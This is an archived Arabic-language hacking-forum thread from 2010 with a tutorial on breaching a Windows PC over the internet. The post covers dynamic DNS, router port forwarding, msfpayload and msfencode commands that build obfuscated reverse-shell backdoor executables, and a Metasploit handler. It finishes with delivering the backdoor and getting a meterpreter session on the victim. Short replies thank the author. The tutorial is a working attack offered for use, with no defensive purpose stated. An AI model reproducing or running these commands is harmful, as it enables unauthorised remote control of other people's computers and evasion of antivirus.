:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   حصري الإختراق بال no-ip وعمل port forwarding على backtarck4 وإختراق ويندوز خارج الشبكة (http://www.vbspiders.com/vb/t35601.html)

punisher77 08-25-2010 11:54 AM

حصري الإختراق بال no-ip وعمل port forwarding على backtarck4 وإختراق ويندوز خارج الشبكة
 
مرحبا بمناسبة رمضان والغياب الطويل وكسر روتين موضوع يفتح النفس للذين فقدوا الامل في المتسبلويت شرح فتح البورت في روتر sagem fast 1201 وميزة جديدة قد لا يعرفها الكثيرين أنها أصبحت تدعم no-ip في إكسبلوات تكتب عنوانك والتجربة ستكون على bt4 attacker متصل بشبكة wifi لصديق لي وويندوز فيستا victime متصل بشبكة داخلية في المنزل وكل جهاز متصل بروتر خاص به .

نقوم في البداية بتحميل no-ip عن طريق synaptic

http://a.imageshack.us/img839/9703/snapshot1j.png

وأثناء تنصيب ستفتح لنا نافذة كما في الصورة التالية في تجربتي تركت المربع خالي حيث خيار عدم تفعيل nat يبدو أن هذه الخطوة مهمة لا أعرف ولكن عند نجاح الاختراق قمت بتبديل الأدوار ففي التجربة الاولى كان جهاز bt4 متصل من شبكة wifi عندما حاولت العكس أي ويندوز على wifi
في المحاولة الاولى إذا لم تنجح قم بكتابة صح على المربع الصغير الضاهر في الصورة ستسأل كيف قم بحذف البرنامج وإعادة تثبيته


http://a.imageshack.us/img832/920/sanstitreqx.jpg

بعد تنصيب no -ip جاء الدور على فتح البورت في المودم في خيار nat نضغط على port fowrarding وبعد ذلك add نكتب البورت المراد استخدامه في حالتي 4444 وبعد ذلكsave

http://a.imageshack.us/img443/1466/snapshot2om.png

وهذه بعض خيارات msfpayload مع وبدون تشفيرة

كود:
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

كود:
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe
كود:
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e
x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe
msfcli multi handler

كود:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E
إنشاء المتربرتر وعمل التنصت على البورت 4444 ونقل الباكدور إلى مجلد الويب سرفير ولتشغيله aplication /services / start httpd var/www

http://a.imageshack.us/img820/9562/snapshot2z.png

كما نرى في الصورة في team viewer نجاح تحميل الباكدور للجهاز

http://a.imageshack.us/img825/7821/snapshot5x.png

نقوم بتشغيله ونحصل على session meterpreter كما في الصورة ip خارجي

http://a.imageshack.us/img683/5104/snapshot8z.png

play slid show to see picture

مكان النجوم w e b

KaLa$nikoV 08-25-2010 12:05 PM

بارك الله فيك على الشرح


واصل ابداعك

CODE3 08-25-2010 12:44 PM

شرح روعه بارك الله فيك

ANONYSPIDER 03-19-2012 06:52 PM

رد: حصري الإختراق بال no-ip وعمل port forwarding على backtarck4 وإختراق ويندوز خارج الشبكة
 
أخي لم أفهم هل هنالك فيديو


الساعة الآن 11:09 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0